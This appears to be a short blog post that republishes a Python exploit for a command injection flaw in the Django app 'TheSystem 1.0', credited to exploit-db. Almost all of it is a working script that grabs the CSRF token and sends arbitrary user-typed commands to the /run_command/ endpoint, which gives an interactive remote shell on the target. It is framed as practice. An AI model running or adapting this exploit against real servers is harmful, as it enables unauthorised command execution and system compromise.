TheSystem 1.0 – Command Injection Exploit

just for fun and practice purpose to write this exploit for ” TheSystem 1.0 – Command Injection

# Exploit Title: TheSystem 1.0 - Command Injection 
# Exploit author : chako
# Date: 2019-10-1
# Software Link: https://github.com/kostasmitroglou/thesystem
# Vuln Reported by: Sadik Cetin 
# Original Post: https://www.exploit-db.com/exploits/47441

#!/usr/bin/python
import requests

target = "http://127.0.0.1:8000/run_command/"

cmd = raw_input("Command># ") 
print cmd



while cmd != "exit" :
    client = requests.session()
    # Retrieve Django CSRF token
    csrfcookie = client.get(target).cookies['csrftoken']
    #print csrfcookie

    payload = {'command':cmd,'csrfmiddlewaretoken':csrfcookie}
    response = client.post(target, data=payload,headers=dict(Referer=target))

    if response.ok:
        print response.text
    else:
        print "error code --> ",response.status_code

    cmd = raw_input("Command># ") 
    print cmd